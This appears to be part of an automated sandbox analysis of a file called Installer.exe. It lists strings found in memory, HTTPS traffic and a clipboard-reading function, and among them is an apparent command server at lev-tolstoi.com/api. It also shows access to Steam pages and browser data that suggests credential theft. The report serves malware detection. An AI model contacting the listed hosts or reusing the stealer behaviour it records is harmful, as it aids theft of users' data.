                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522806645.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1874516417.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522806645.0000000003596000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1874516417.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1973390326.0000000003594000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522806645.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1874516417.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522806645.0000000003596000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1874516417.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1973390326.0000000003594000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: Installer.exe, 00000003.00000003.1831936100.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1832003784.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: Installer.exe, 00000003.00000003.1831936100.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1832003784.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Installer.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Installer.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Installer.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/en/
Source: Installer.exe, 00000003.00000003.1832003784.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: Installer.exe, 00000003.00000003.1973390326.0000000003594000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/
Source: Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/$5
Source: Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/.V
Source: Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/NVmA
Source: Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/S
Source: Installer.exe, 00000003.00000002.3522783205.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1874516417.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1857732899.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522850186.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1785844021.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1973344766.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835542248.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/api
Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/api#4
Source: Installer.exe, 00000003.00000002.3522783205.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/apim
Source: Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/apix:Z
Source: Installer.exe, 00000003.00000002.3522659058.0000000003512000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/espF
Source: Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522659058.0000000003512000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/pi
Source: Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/pi.W
Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.steampowered.com/
Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lv.queniujq.cn
Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://medal.tv
Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://player.vimeo.com
Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net
Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s.ytimg.com;
Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sketchfab.com
Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steam.tv/
Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast.akamaized.net
Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/discussions/
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/market/
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/workshop/
Source: Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/
Source: Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/;
Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
Source: Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/about/
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/explore/
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/legal/
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/mobile
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/news/
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/points/shop/
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/stats/
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: Installer.exe, 00000003.00000003.1763175969.0000000005CE3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.microsof
Source: Installer.exe, 00000003.00000003.1809808944.0000000005D67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Installer.exe, 00000003.00000003.1809808944.0000000005D67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Installer.exe, 00000003.00000003.1763175969.0000000005CE3000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1763272472.0000000005C97000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1785769288.0000000005C97000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Installer.exe, 00000003.00000003.1763272472.0000000005C72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Installer.exe, 00000003.00000003.1763175969.0000000005CE3000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1763272472.0000000005C97000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1785769288.0000000005C97000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Installer.exe, 00000003.00000003.1763272472.0000000005C72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Installer.exe, 00000003.00000003.1831936100.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1832003784.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: Installer.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: Installer.exe | String found in binary or memory: https://www.entrust.net/rpa0
Source: Installer.exe, 00000003.00000003.1831936100.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1832003784.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: Installer.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/
Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: Installer.exe, 00000003.00000003.1809808944.0000000005D67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Installer.exe, 00000003.00000003.1809808944.0000000005D67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Installer.exe, 00000003.00000003.1809808944.0000000005D67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Installer.exe, 00000003.00000003.1809808944.0000000005D67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Installer.exe, 00000003.00000003.1809808944.0000000005D67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com
Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00433600 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard, 3_2_00433600
